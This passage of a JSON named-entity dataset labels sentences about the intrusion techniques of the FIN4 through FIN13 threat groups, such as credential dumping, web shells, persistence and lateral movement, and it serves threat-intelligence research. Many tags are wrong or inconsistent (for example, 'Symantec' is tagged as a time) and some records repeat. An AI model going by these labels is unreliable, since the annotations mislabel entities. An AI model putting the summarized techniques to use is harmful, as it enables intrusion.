"tokens": [ "FIN13", "has", "used", "Windows", "Registry", "run", "keys", "such", "as,", "`HKEY_LOCAL_MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\hosts`", "to", "maintain", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "remotely", "accessed", "compromised", "environments", "via", "Remote", "Desktop", "Services", "(RDS)", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "leveraged", "SMB", "to", "move", "laterally", "within", "a", "compromised", "network", "via", "application", "servers", "and", "SQL", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "remotely", "accessed", "compromised", "environments", "via", "secure", "shell", "(SSH)", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "created", "scheduled", "tasks", "in", "the", "`C:\\Windows`", "directory", "of", "the", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "extracted", "the", "SAM", "and", "SYSTEM", "registry", "hives", "using", "the", "`reg.exe`", "binary", "for", "obtaining", "password", "hashes", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "collected", "local", "host", "information", "by", "utilizing", "Windows", "commands", "`systeminfo`,", "`fsutil`,", "and", "`fsinfo`.", "FIN13", "has", "also", "utilized", "a", "compromised", "Symantex", "Altiris", "console", "and", "LanDesk", "account", "to", "retrieve", "host", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "`nslookup`", "and", "`ipconfig`", "for", "network", "reconnaissance", "efforts.", "FIN13", "has", "also", "utilized", "a", "compromised", "Symantec", "Altiris", "console", "and", "LanDesk", "account", "to", "retrieve", "network", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-Time", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "`netstat`", "and", "other", "net", "commands", "for", "network", "reconnaissance", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "publicly", "available", "tools", "such", "as", "Mimikatz,", "Impacket,", "PWdump7,", "ProcDump,", "Nmap,", "and", "Incognito", "V2", "for", "targeting", "efforts." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "VBS", "scripts", "for", "code", "execution", "on", "comrpomised", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "used", "HTTP", "requests", "to", "chain", "multiple", "web", "shells", "and", "to", "contact", "actor-controlled", "C2", "servers", "prior", "to", "exfiltrating", "stolen", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "obfuscated", "and", "open-source", "web", "shells", "such", "as", "JspSpy,", "reGeorg,", "MiniWebCmdShell,", "and", "Vonloesch", "Jsp", "File", "Browser", "1.2", "to", "enable", "remote", "code", "execution", "and", "to", "execute", "commands", "on", "compromised", "web", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "leveraged", "`xp_cmdshell`", "and", "Windows", "Command", "Shell", "to", "execute", "commands", "on", "a", "compromised", "machine.", "FIN13", "has", "also", "attempted", "to", "leverage", "the", "‘xp_cmdshell’", "SQL", "procedure", "to", "execute", "remote", "commands", "on", "internal", "MS-SQL", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "utilized", "`WMI`", "to", "execute", "commands", "and", "move", "laterally", "on", "compromised", "Windows", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN13", "has", "leveraged", "`WMI`", "to", "move", "laterally", "within", "a", "compromised", "network", "via", "application", "servers", "and", "SQL", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "created", "rules", "in", "victims'", "Microsoft", "Outlook", "accounts", "to", "automatically", "delete", "emails", "containing", "words", "such", "as", "“hacked,\"", "\"phish,\"", "and", "“malware\"", "in", "a", "likely", "attempt", "to", "prevent", "organizations", "from", "communicating", "about", "their", "activities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct" ] }, { "tokens": [ "FIN4", "has", "presented", "victims", "with", "spoofed", "Windows", "Authentication", "prompts", "to", "collect", "their", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "captured", "credentials", "via", "fake", "Outlook", "Web", "App", "(OWA)", "login", "pages", "and", "has", "also", "used", "a", ".NET", "based", "keylogger." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "FIN4", "has", "lured", "victims", "to", "launch", "malicious", "attachments", "delivered", "via", "spearphishing", "emails", "(often", "sent", "from", "compromised", "accounts)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "B-SecTeam", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "lured", "victims", "to", "click", "malicious", "links", "delivered", "via", "spearphishing", "emails", "(often", "sent", "from", "compromised", "accounts)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "used", "Tor", "to", "log", "in", "to", "victims'", "email", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "accessed", "and", "hijacked", "online", "email", "communications", "using", "stolen", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "O" ] }, { "tokens": [ "FIN4", "has", "used", "spearphishing", "emails", "containing", "attachments", "(which", "are", "often", "stolen,", "legitimate", "documents", "sent", "from", "compromised", "accounts)", "with", "embedded", "malicious", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "used", "spearphishing", "emails", "(often", "sent", "from", "compromised", "accounts)", "containing", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "used", "legitimate", "credentials", "to", "hijack", "email", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "used", "VBA", "macros", "to", "display", "a", "dialog", "box", "and", "collect", "victim", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN4", "has", "used", "HTTP", "POST", "requests", "to", "transmit", "data." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "scans", "processes", "on", "all", "victim", "systems", "in", "the", "environment", "and", "uses", "automated", "scripts", "to", "pull", "back", "the", "results." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "has", "has", "used", "the", "tool", "GET2", "Penetrator", "to", "look", "for", "remote", "login", "and", "hard-coded", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-HackOrg", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "has", "cleared", "event", "logs", "from", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "scans", "processes", "on", "all", "victim", "systems", "in", "the", "environment", "and", "uses", "automated", "scripts", "to", "pull", "back", "the", "results." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "maintains", "access", "to", "victim", "environments", "by", "using", "FLIPSIDE", "to", "create", "a", "proxy", "for", "a", "backup", "RDP", "tunnel." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FIN5", "has", "used", "legitimate", "VPN,", "Citrix,", "or", "VNC", "credentials", "to", "maintain", "access", "to", "a", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "uses", "SDelete", "to", "clean", "up", "the", "environment", "and", "attempt", "to", "prevent", "detection." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "scripts", "save", "memory", "dump", "data", "into", "a", "specific", "directory", "on", "hosts", "in", "the", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN5", "has", "used", "the", "open", "source", "tool", "Essential", "NetTools", "to", "map", "the", "network", "and", "build", "a", "list", "of", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O" ] }, { "tokens": [ "FIN5", "has", "obtained", "and", "used", "a", "customized", "version", "of", "PsExec,", "as", "well", "as", "use", "other", "tools", "such", "as", "pwdump,", "SDelete,", "and", "Windows", "Credential", "Editor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "FIN5", "has", "used", "legitimate", "VPN,", "RDP,", "Citrix,", "or", "VNC", "credentials", "to", "maintain", "access", "to", "a", "victim", "environment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Tool", "B-Way", "B-Way", "O", "B-Way", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "has", "used", "Metasploit’s", "named-pipe", "impersonation", "technique", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Following", "data", "collection,", "FIN6", "has", "compressed", "log", "files", "into", "a", "ZIP", "archive", "prior", "to", "staging", "and", "exfiltration." ], "ner_tags": [ "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "encoded", "data", "gathered", "from", "the", "victim", "with", "a", "simple", "substitution", "cipher", "and", "single-byte", "XOR", "using", "the", "0xAA", "key,", "and", "Base64", "with", "character", "permutation." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN6", "used", "the", "Plink", "command-line", "utility", "to", "create", "SSH", "tunnels", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "a", "script", "to", "iterate", "through", "a", "list", "of", "compromised", "PoS", "systems,", "copy", "and", "remove", "data", "to", "a", "log", "file,", "and", "to", "bind", "to", "events", "from", "the", "submit", "payment", "button." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "Comodo", "code-signing", "certificates." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "FIN6", "has", "used", "encoded", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "FIN6", "has", "used", "scripting", "to", "iterate", "through", "a", "list", "of", "compromised", "PoS", "systems,", "copy", "data", "to", "a", "log", "file,", "and", "remove", "the", "original", "data", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "the", "Stealer", "One", "credential", "stealer", "to", "target", "e-mail", "and", "file", "transfer", "utilities", "including", "FTP." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Org", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "the", "Stealer", "One", "credential", "stealer", "to", "target", "web", "browsers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "collected", "schemas", "and", "user", "accounts", "from", "systems", "running", "SQL", "Server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "collected", "and", "exfiltrated", "payment", "card", "data", "from", "compromised", "systems." ], "ner_tags": [ "B-Idus", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "deployed", "a", "utility", "script", "named", "<code>kill.bat</code>", "to", "disable", "anti-virus." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "Metasploit’s", "PsExec", "NTDSGRAB", "module", "to", "obtain", "a", "copy", "of", "the", "victim's", "Active", "Directory", "database." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "sent", "stolen", "payment", "card", "data", "to", "remote", "servers", "via", "HTTP", "POSTs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FIN6", "has", "used", "tools", "to", "exploit", "Windows", "vulnerabilities", "in", "order", "to", "escalate", "privileges.", "The", "tools", "targeted", "CVE-2013-3660,", "CVE-2011-2005,", "and", "CVE-2010-4398,", "all", "of", "which", "could", "allow", "local", "users", "to", "access", "kernel-level", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "removed", "files", "from", "victim", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "malicious", "JavaScript", "to", "steal", "payment", "card", "data", "from", "e-commerce", "sites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "B-Idus", "O" ] }, { "tokens": [ "FIN6", "has", "used", "Windows", "Credential", "Editor", "for", "credential", "dumping." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "malicious", "documents", "to", "lure", "victims", "into", "allowing", "execution", "of", "PowerShell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "renamed", "the", "\"psexec\"", "service", "name", "to", "\"mstdc\"", "to", "masquerade", "as", "a", "legitimate", "Windows", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "Metasploit’s", "PsExec", "NTDSGRAB", "module", "to", "obtain", "a", "copy", "of", "the", "victim's", "Active", "Directory", "database." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "used", "publicly", "available", "tools", "(including", "Microsoft's", "built-in", "SQL", "querying", "tool,", "osql.exe)", "to", "map", "the", "internal", "network", "and", "conduct", "reconnaissance", "against", "Active", "Directory,", "Structured", "Query", "Language", "(SQL)", "servers,", "and", "NetBIOS." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Org", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FIN6", "has", "used", "Metasploit", "Bind", "and", "Reverse", "TCP", "stagers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "FIN6", "has", "extracted", "password", "hashes", "from", "ntds.dit", "to", "crack", "offline." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "PowerShell", "to", "gain", "access", "to", "merchant's", "networks,", "and", "a", "Metasploit", "PowerShell", "module", "to", "download", "and", "execute", "shellcode", "and", "to", "set", "up", "a", "local", "listener." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Purp", "O", "B-Purp", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "used", "the", "Plink", "command-line", "utility", "to", "create", "SSH", "tunnels", "to", "C2", "servers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "Registry", "Run", "keys", "to", "establish", "persistence", "for", "its", "downloader", "tools", "known", "as", "HARDTACK", "and", "SHIPBREAD." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "FIN6", "actors", "have", "compressed", "data", "from", "remote", "systems", "and", "moved", "it", "to", "another", "staging", "system", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "used", "RDP", "to", "move", "laterally", "in", "victim", "networks." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "used", "publicly", "available", "tools", "(including", "Microsoft's", "built-in", "SQL", "querying", "tool,", "osql.exe)", "to", "map", "the", "internal", "network", "and", "conduct", "reconnaissance", "against", "Active", "Directory,", "Structured", "Query", "Language", "(SQL)", "servers,", "and", "NetBIOS." ], "ner_tags": [ "B-Idus", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Org", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "FIN6", "has", "used", "scheduled", "tasks", "to", "establish", "persistence", "for", "various", "malware", "it", "uses,", "including", "downloaders", "known", "as", "HARDTACK", "and", "SHIPBREAD", "and", "FrameworkPOS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "FIN6", "has", "created", "Windows", "services", "to", "execute", "encoded", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "targeted", "victims", "with", "e-mails", "containing", "malicious", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "fake", "job", "advertisements", "sent", "via", "LinkedIn", "to", "spearphish", "targets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FIN6", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz,", "Cobalt", "Strike,", "and", "AdFind." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Way" ] }, { "tokens": [ "To", "move", "laterally", "on", "a", "victim", "network,", "FIN6", "has", "used", "credentials", "stolen", "from", "various", "systems", "on", "which", "it", "gathered", "usernames", "and", "password", "hashes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "Pastebin", "and", "Google", "Storage", "to", "host", "content", "for", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "<code>kill.bat</code>", "script", "to", "disable", "security", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "FIN6", "has", "used", "WMI", "to", "automate", "the", "remote", "execution", "of", "PowerShell", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "application", "shim", "databases", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "legitimate", "services", "like", "Google", "Docs,", "Google", "Scripts,", "and", "Pastebin", "for", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Tool", "O", "I-Tool", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "random", "junk", "code", "to", "obfuscate", "malware", "code." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "signed", "Carbanak", "payloads", "with", "legally", "purchased", "code", "signing", "certificates.", "FIN7", "has", "also", "digitally", "signed", "their", "phishing", "documents,", "backdoors", "and", "other", "staging", "tools", "to", "bypass", "security", "controls." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "fragmented", "strings,", "environment", "variables,", "standard", "input", "(stdin),", "and", "native", "character-replacement", "functionalities", "to", "obfuscate", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "I-Tool", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "SQL", "scripts", "to", "help", "perform", "tasks", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "gained", "initial", "access", "by", "compromising", "a", "victim's", "software", "supply", "chain." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "performed", "C2", "using", "DNS", "via", "A,", "OPT,", "and", "TXT", "records." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Tool", "B-Way", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "encrypted", "virtual", "disk", "volumes", "on", "ESXi", "servers", "using", "a", "version", "of", "Darkside", "ransomware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "collected", "files", "and", "other", "sensitive", "information", "from", "a", "compromised", "network." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "used", "the", "command", "`net", "group", "\"domain", "admins\"", "/domain`", "to", "enumerate", "domain", "groups." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "registered", "look-alike", "domains", "for", "use", "in", "phishing", "campaigns." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "FIN7", "has", "compromised", "a", "digital", "product", "website", "and", "modified", "multiple", "download", "links", "to", "point", "to", "trojanized", "versions", "of", "offered", "digital", "products." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "spear", "phishing", "campaigns", "have", "included", "malicious", "Word", "documents", "with", "DDE", "execution." ], "ner_tags": [ "B-Idus", "I-OffAct", "I-OffAct", "O", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "exfiltrated", "stolen", "data", "to", "the", "MEGA", "file", "sharing", "site." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "has", "compromised", "targeted", "organizations", "through", "exploitation", "of", "CVE-2021-31207", "in", "Exchange." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "FIN7", "has", "exploited", "ZeroLogon", "(CVE-2020-1472)", "against", "vulnerable", "domain", "controllers." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7's", "Harpy", "backdoor", "malware", "can", "use", "DNS", "as", "a", "backup", "channel", "for", "C2", "if", "HTTP", "fails." ], "ner_tags": [ "B-Idus", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "FIN7", "has", "downloaded", "additional", "malware", "to", "execute", "on", "the", "victim's", "machine,", "including", "by", "using", "a", "PowerShell", "script", "to", "launch", "shellcode", "that", "retrieves", "an", "additional", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "FIN7", "used", "JavaScript", "scripts", "to", "help", "perform", "tasks", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { 